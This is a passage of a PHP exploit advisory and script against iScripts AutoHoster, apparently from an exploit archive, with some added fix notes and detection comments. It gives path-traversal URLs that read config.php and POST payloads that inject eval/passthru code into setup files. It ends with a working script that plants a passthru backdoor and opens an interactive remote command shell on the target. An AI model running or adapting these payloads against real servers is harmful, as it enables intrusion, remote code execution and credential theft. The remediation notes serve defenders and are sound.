probably injected by the Guy who nulled the script (thank u any way ;p)
$filename = urldecode($_GET['fname']);
header("content-disposition:attachment;filename=$filename");
readfile($filename)
no need to cancel any thing , just beat it bro ;)
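[+] Exploit : /admin/downloadfile.php?fname=../includes/config.php
Root cause : fname is URL-decoded and handed to readfile() unchanged, so any file the web server can read is served. Fix : resolve the path with realpath(), refuse anything outside one fixed download directory, and send only basename() of it in the Content-Disposition header.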
/support/admin/csvdownload.php
$filename="../csvfiles/".addslashes($_GET["id"]).".txt";
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($filename));
header('Content-Disposition: attachment; filename=' . basename($filename));
readfile($filename);
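[+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00
addslashes() does nothing against ../ sequences, so id can leave ../csvfiles/. The trailing %00 is meant to cut off the appended ".txt"; PHP 5.3.4 and later reject paths containing a NUL byte, and addslashes() itself escapes NUL, so the truncation may not apply on a given install - the traversal to other readable .txt files remains either way. Fix : accept only the expected id format (for example digits only) before building the path.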
IV. Directory traversal vuln.
/support/parser/main_smtp.php
^
Just a light sandwich before the fatty food :))
V.PHP Code Injection Vuln.
Here come the King :D
/setup/TLDSetup.php
$tldselected = $HTTP_POST_VARS[ "tldselect" ];
$tldcount = count ($tldselected);
for ($j = 0; $j < $tldcount; $j++)
{
$tldList .= "\n";
$tldHoldList .= "\$" . str_replace(".", "", $tldselected[$j]) . "= 1;\n";
}
//set up TLD list
if ($HTTP_POST_VARS[ "tldsetup" ] == 1 or $HTTP_POST_VARS[ "original" ] == 1) {
$tldfile = fopen("./tldListOne.php", "w");
fwrite($tldfile, "");
fclose($tldfile);
$tldHoldfile = fopen("./tldHoldList.php", "w");
fwrite($tldHoldfile, "");
fclose($tldHoldfile);
}
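Each tldselect[] value is pasted into a line of PHP source ($tldHoldList) with only the dots removed, and the setup script opens tldListOne.php and tldHoldList.php for writing - so POST data ends up inside PHP files under /setup/.
oOps , what should we do yar?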
so simple :)
just post these parameters to /setup/TLDSetup.php
tldsetup=1&tldselect[]=faris"){eval(base64_decode($_REQUEST[fa]));}elseif ($cTld=="lame&x=49&y=13
Damn simple :)
now just go to
/setup/tldListOne.php
Enter ur base64 php code as value for the parameter fa
Example
post parameter : fa=cGhwaW5mbygpOw==
this will eval phpinfo(); , u can replace it by fopening ur own php file
It's working , But magic_quotes_gpc will fu#* it up :(
Need cleaner file???
then post these parameters at : /setup/TLDSetup.php
Post : tldsetup=1&tldselect[]=faris=1337;eval(base64_decode($_REQUEST[fa]));$junk&x=49&y=13
Now ur eval code can be executed at /setup/tldHoldList.php
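That's much better , huh?
No quotes , let magic_quotes_gpc suffer ;)
magic_quotes_gpc only escapes quote characters, backslashes and NUL, so it was never a defence for this bug (and the setting is gone since PHP 5.4). Fix : validate every TLD against a strict pattern such as ^[a-z0-9-]+$ before use, keep the list as data rather than generated PHP, and remove or lock down /setup/ once installation is finished.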
/websitebuilder/createcustom.php
if ($_POST["btnSubmit"] == "Create Custom Form") {
$message = "";
$txtEmailAddress = $_POST["txtEmailAddress"];//the form will be mailed to this email address on submission
$txtPageName = $_POST["txtPageName"];//the actual page name
$txtPageDisplayName = $_POST["txtPageDisplayName"];//for display in links
$txtPageHeading = $_POST["txtPageHeading"];//the heading of the page
$formelements = $_POST["formelements"];//holds the form elements to be embedded in the page
$formstart = "
" . $txtPageHeading . "
";
$formend = "
";
$formtext = $formstart . $formelements . $formend;
if ($message != "") {
$message = " Please correct the following errors to continue!" . $message;
}
if ($message == "") {//if no error, proceed with creating page, inserting to database etc
$sql = "SELECT sm.vlinks, sm.vsub_sitelinks, tm.vlink_separator,tm.vsublink_separator,tm.vlink_type,tm.vsublink_type FROM " . $sitemaster . " sm INNER JOIN ".TABLE_PREFIX."template_mast tm ON sm.ntemplate_id = tm.ntemplate_mast ";
$sql .= " WHERE sm." . $siteidfield . " = '" . addslashes($siteid) . "'";
// echo $sql;
$res = mysql_query($sql);
if (mysql_num_rows($res) != 0) {
$row = mysql_fetch_array($res);
$links = $row["vlinks"];
$sublinks = $row["vsub_sitelinks"];
$linkseparator = $row["vlink_separator"];
$sublinkseparator = $row["vsublink_separator"];
$linktype = $row["vlink_type"];
$sublinktype = $row["vsublink_type"];
$pagelink = "" . $txtPageDisplayName . "";
if ($linktype == "horizontal") {
$newlink = $links . $linkseparator . $pagelink;
} else if ($linktype == "vertical") {
$newlink = $links . $linkseparator . $pagelink . " ";
}
if ($sublinktype == "horizontal") {
$newsublink = $sublinks . $sublinkseparator . $pagelink;
} else if ($sublinktype == "vertical") {
$newsublink = $sublinks . $sublinkseparator . $pagelink . " ";
}
if ($links != "") {
$sql = "UPDATE " . $sitemaster . " SET vlinks = '" . addslashes($newlink) . "', vsub_sitelinks='" . addslashes($newsublink) . "' WHERE " . $siteidfield . " = '" . addslashes($siteid) . "' ";
mysql_query($sql);//adding links to database
$pagename = $txtPageDisplayName;
$filename = $txtPageName;
$pagetitle = $txtPageDisplayName;
$pagetype = "custom";
$type = "simple";
$sql2 = "INSERT INTO " . $sitepagetable . "(" . $siteidfield . ", vpage_name,vpage_title,vpage_type,vtype) VALUES ('" . addslashes($siteid) . "','" . addslashes($pagename) . "','" . addslashes($pagetitle) . "','" . addslashes($pagetype) . "','" . addslashes($type) . "') ";
mysql_query($sql2); //adding the new page to database
$newfilename = $sitefoldername . "/" . $filename;
if ($sitepagesfoldername != "") {//if it is a temp site(not completed), then create a file in the sitepages folder also
$newsitepagefilename = $sitepagesfoldername . "/" . $filename;
$fp1 = fopen($newsitepagefilename, "w+");
fwrite($fp1, $formtext);
fclose($fp1);
}
So , all we need is valid authorized siteid :)
it's simple
Make new site
Go to Editing Your site
Link will be like : editsitepageoption.php?type=new&actiontype=editsite&templateid=51&tempsiteid=1
tempsiteid=1 > that's what we need
now time for injection :)
Go to : websitebuilder/createcustom.php
Post parameters : siteid=1&btnSubmit=Create Custom Form&txtPageName=faris.php&formelements= phpinfo(); ?>
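Damn obvious , hah ;)
Injected file is located at : /websitebuilder/workarea/tempsites/1/faris.php
Root cause : txtPageName is used as the file name and formelements as the file body with no filtering, so the caller chooses both the .php extension and the content. Fix : build the file name server-side with a fixed non-executable extension, reject path separators, treat formelements as data to be escaped, and configure the web server not to execute PHP under the workarea and site folders.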
Well ,
this fool wasted me abt 80 mins :|
*/
// Emit the banner line by line, then the prompt; the text is the same as
// before, only gathered into a list.
$bannerLines = [
    "\n+-----------------------------+\n",
    "| iScripts AutoHoster |\n",
    "| PHP Code injection By i-Hmx |\n",
    "| n0p1337@gmail.com |\n",
    "| sec4ever.com , 1337s.cc |\n",
    "+-----------------------------+\n",
    "\n| Enter Target [http://SITE.COM/PATH/] # ",
];
foreach ($bannerLines as $bannerLine) {
    echo $bannerLine;
}

// Base URL of the installation under test: one line from standard input,
// with surrounding whitespace removed.
$target = trim(fgets(STDIN));
/**
 * Return the text found between the first occurrence of $start and the next
 * occurrence of $end in $string.
 *
 * @param string $string Text to search.
 * @param string $start  Left delimiter.
 * @param string $end    Right delimiter, searched for after $start.
 * @return string The enclosed text, or "" when $start is not found.
 */
function kastr($string, $start, $end){
    // One byte of padding means a real match can never sit at offset 0, so
    // the loose "== 0" test below is true only when strpos() returned false.
    $haystack = " " . $string;
    $from = strpos($haystack, $start);
    if ($from == 0) {
        return "";
    }

    // Skip past the left delimiter itself.
    $from = $from + strlen($start);

    // NOTE(review): if $end is missing, strpos() yields false and the length
    // below becomes negative; substr() then decides the result.
    $until = strpos($haystack, $end, $from);

    return substr($haystack, $from, $until - $from);
}
/**
 * Send one HTTP request with cURL and return the response body.
 *
 * @param string $url  Address to request.
 * @param string $post Value given to CURLOPT_POSTFIELDS; because that option
 *                     is always set, libcurl sends the request as a POST.
 * @return string|bool Whatever curl_exec() returns: the body, or false on failure.
 */
function faget($url,$post){
    $handle = curl_init();

    // Options are applied one at a time, in the order listed.
    $settings = [
        CURLOPT_RETURNTRANSFER => 1,      // hand the body back instead of printing it
        CURLOPT_URL            => $url,
        CURLOPT_POSTFIELDS     => $post,
        // '/' is a directory, not a usable cookie file - presumably only
        // there to switch on cURL's cookie handling; TODO confirm.
        CURLOPT_COOKIEFILE     => '/',
        CURLOPT_COOKIEJAR      => '/',
        // NOTE(review): certificate and host-name checks are both disabled,
        // so the identity of the responding server is not verified.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_FOLLOWLOCATION => 0,      // redirects are not followed
        CURLOPT_TIMEOUT        => 20,     // seconds
        CURLOPT_HEADER         => false,  // response headers are left out of the result
    ];
    foreach ($settings as $option => $value) {
        curl_setopt($handle, $option, $value);
    }

    $response = curl_exec($handle);
    curl_close($handle);

    return $response;
}
// Proof-of-concept flow for the /setup/TLDSetup.php code injection described
// in the advisory comment earlier in this file.
// For defenders, the traffic produced below is:
//   1. one POST to /setup/TLDSetup.php/ with tldsetup=1 and a tldselect[]
//      value that contains PHP statements instead of a TLD;
//   2. requests to /setup/tldHoldList.php, later ones carrying base64 text
//      in an "fa" query parameter.
// NOTE(review): both patterns look suitable for log or WAF alerting, and
// presumably nothing under /setup/ needs to be reachable after installation
// - confirm against the product's install guide.
echo "\n| Injecting Payload\n";
// Step 1: submit the crafted tldselect[] value to the setup script.
faget($target."/setup/TLDSetup.php/",'tldsetup=1&tldselect[]=faris=1337;passthru(base64_decode($_REQUEST[fa]));$junk&x=49&y=13');
// Step 2: success check - looks for the literal text "passthru" in the body
// returned for tldHoldList.php (the empty group "()" in the pattern matches
// nothing, so it does not change what is searched for).
if (!preg_match("/passthru()/", faget($target."/setup/tldHoldList.php", "")))
{
die("\n[-] Exploit Failed\n");
}
// Host part of the target URL (text between "//" and the next "/"); used
// only to build the prompt string below.
$myh=kastr($target,"//","/");
print "| sec4ever shell online\n";
// Interactive loop: each line read from standard input is base64-encoded and
// sent as the "fa" parameter to tldHoldList.php; the response body is printed.
// Typing "exit" ends the script.
while(1)
{
print "\ni-Hmx@$myh# ";
$fa=trim(fgets(STDIN));
if($fa=="exit")
{
die("\n[*] Terminating\n");
}
$fax=base64_encode($fa);
$fadata = faget($target."/setup/tldHoldList.php?fa=$fax","");
print $fadata;
}
/*
Msg for *** ******
Don't sell what's not belonging to you :)
have a good day
*/
?>